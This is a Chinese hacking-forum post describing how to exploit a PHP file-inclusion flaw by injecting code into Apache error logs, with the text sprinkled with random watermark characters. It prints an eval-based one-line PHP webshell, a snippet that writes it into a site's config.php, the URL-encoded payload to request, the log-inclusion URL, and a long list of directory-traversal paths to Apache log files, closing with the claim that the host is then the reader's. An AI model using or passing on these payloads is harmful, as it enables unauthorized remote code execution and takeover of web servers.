找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1813|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 ( B. ^; ^# P9 ~8 P$ N
, A- B9 @+ e# W# }0 B* z1 E
比如还是这句一句话木马
# y9 Q  @4 d! Z7 `: c$ e! j9 _<?eval($_POST[cmd]);?>   0 d  A9 k+ q$ _2 C' r1 }

# ^) j9 ]0 l% F3 O1 r9 S到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 9 e5 v0 _1 W3 @  x
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
# C. Q: m1 {5 f1 v8 O
& \4 ~- g8 L4 _$ t<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); ! k) F/ I4 t5 @1 E5 L* T2 n( H, N
fclose($fp);?>   //在config.php里写入一句木马语句
0 E2 v+ s6 z7 h
- l, o; v; W, U+ N我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 6 r& p. L+ t* i7 J' j' d
转换为 ) f- j! u& f# z
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F 9 F; I4 }8 h; a
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
5 o) ?( J. r5 }" y4 i%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
# R3 e/ k. R+ `3 R+ }# g  d2 X  Nfclose%28%24fp%29%3B%3F%3E 4 ?! D, ~5 E6 ]3 K( v/ f* Y4 {+ }
我们提交
" A( s' T9 h" V4 l! c' W$ _9 P: z0 Chttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 6 F" i2 f: O9 W& U
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
8 r. I# S: @% j%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B + F' l( Y! C8 z; d' K
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
2 c7 N" Z- w8 M6 w/ ~
% s7 p) f3 J; _9 K2 w这样就错误日志里就记录下了这行写入webshell的代码。 ' d: `, E" v* J1 R* z6 Q
我们再来包含日志,提交
$ X7 g" I6 R# b" [1 khttp://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
% k9 \" b( k3 i/ V1 x) Q6 k
2 b0 ^3 z1 T( a( [2 Z5 T这样webshell就写入成功了,config.php里就写入一句木马语句
; z- C3 n5 A5 Z8 Q' IOK. $ U6 F5 c: u: [/ F% Q- n
http://www.xxx.com/forum/config.php这个就成了我们的webshell
+ y: i. o2 A! B& [+ `直接用lanker的客户端一连,主机就是你的了。
7 [6 `) C) E$ J: q% e2 |* j9 }6 ]' y: O* r0 y  M5 a! O
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
+ e5 d# p" ?! {1 A* o) M* X) I- l( k: J# Z) P3 h! \$ i3 _0 Q
其他的日志路径,你可以去猜,也可以参照这里。 : }, o) U. e! R! Y0 ^, {& c9 g+ w
../../../../../../../../../../var/log/httpd/access_log 0 b% A- X& ]+ q- R% l& V7 y" }
../../../../../../../../../../var/log/httpd/error_log
: _5 h4 i3 a! B* W../apache/logs/error.log " \0 G, `0 Z- v- N
../apache/logs/access.log
+ @6 B8 u% z  A1 h../../apache/logs/error.log 8 e  v( q& G4 B* w4 h
../../apache/logs/access.log
7 l; E( i( D5 _8 Y../../../apache/logs/error.log
; ^, D# b) _4 o' }0 D9 H../../../apache/logs/access.log 6 q' K5 l9 V2 v
../../../../../../../../../../etc/httpd/logs/acces_log
( G6 m7 ~' d3 O: }6 z../../../../../../../../../../etc/httpd/logs/acces.log
* i9 q1 N( e1 H& D& {2 c3 J../../../../../../../../../../etc/httpd/logs/error_log 6 p+ t& S" ^/ }; `( K/ O
../../../../../../../../../../etc/httpd/logs/error.log
' x. L; F, s" L( b../../../../../../../../../../var/www/logs/access_log & z. I# O5 G# S2 }/ x  O
../../../../../../../../../../var/www/logs/access.log
, _. ^1 G$ R: q0 q0 a6 W../../../../../../../../../../usr/local/apache/logs/access_log 2 H! J2 G/ Z" H; l. C4 u' Z) Y
../../../../../../../../../../usr/local/apache/logs/access.log 9 J: _8 \" |5 Q% ^
../../../../../../../../../../var/log/apache/access_log 6 N6 g1 l! R0 O  J0 @, f9 f
../../../../../../../../../../var/log/apache/access.log
: b- C2 F' D, d: v& ~../../../../../../../../../../var/log/access_log
" P/ i# P! u: h6 q- W( d../../../../../../../../../../var/www/logs/error_log ; J6 S' t5 x& Q) |5 H; j
../../../../../../../../../../var/www/logs/error.log
. E5 M% Q) l$ A. o1 h5 v) b- K../../../../../../../../../../usr/local/apache/logs/error_log . y' ]8 v' e: V5 q
../../../../../../../../../../usr/local/apache/logs/error.log
, X( `( l$ Z; t../../../../../../../../../../var/log/apache/error_log
/ Y; t! w4 Z4 h, M6 E0 ~../../../../../../../../../../var/log/apache/error.log 7 Z$ m1 G+ O" p8 M
../../../../../../../../../../var/log/access_log 2 {( D1 [! j" ]  c! R! e9 B
../../../../../../../../../../var/log/error_log
4 H- y" d9 L! A& e3 h/var/log/httpd/access_log      
$ y- k! I' T% }# ]/ J/var/log/httpd/error_log     
! [" T  A3 T+ n& i- L; [. y../apache/logs/error.log     1 w+ X$ g5 D0 D0 A0 `" A+ s' E
../apache/logs/access.log
" h& ~, ~! y: ]7 A../../apache/logs/error.log & u: e) P4 N* i. W1 f7 j& ^
../../apache/logs/access.log
3 J9 V2 e0 H3 _../../../apache/logs/error.log 4 T; A5 A; b/ |$ Q
../../../apache/logs/access.log 4 T/ E  b! E* d8 k9 R
/etc/httpd/logs/acces_log
7 a8 ]# L  k& P) c  Z5 s/etc/httpd/logs/acces.log " N! F8 m5 }- k9 x) P1 N; I  y9 s
/etc/httpd/logs/error_log 5 h- @( T: H- ?9 x9 K# C
/etc/httpd/logs/error.log ' i6 |/ b+ m% A+ N' H
/var/www/logs/access_log
2 i; C' [4 q/ W' w" ?& S- e/var/www/logs/access.log & S- l! ^7 d$ C. J
/usr/local/apache/logs/access_log 3 L! @- i# d3 h/ z. M3 ]2 u( w3 _
/usr/local/apache/logs/access.log $ P/ l5 _* p  I, X" A9 `# p
/var/log/apache/access_log
6 i5 c8 y. W. F7 [/var/log/apache/access.log
. e3 y$ `1 K. k- H/var/log/access_log
' P# |0 ~+ o  ^, N. B" j; t/var/www/logs/error_log
5 X# `9 j$ ~- F1 `' F9 M/var/www/logs/error.log
/ N' t+ y* A/ v- s/usr/local/apache/logs/error_log 9 p- R2 _4 i6 g+ a$ A7 t
/usr/local/apache/logs/error.log , ?& D0 i' J) }8 C( A8 f8 n5 N
/var/log/apache/error_log , [! {  t' x% j' w2 B8 ]5 e. h7 e
/var/log/apache/error.log 5 ?$ z2 ~* g7 ^: g  C: P; n$ a2 f9 }
/var/log/access_log # p4 [6 g) p+ p
/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表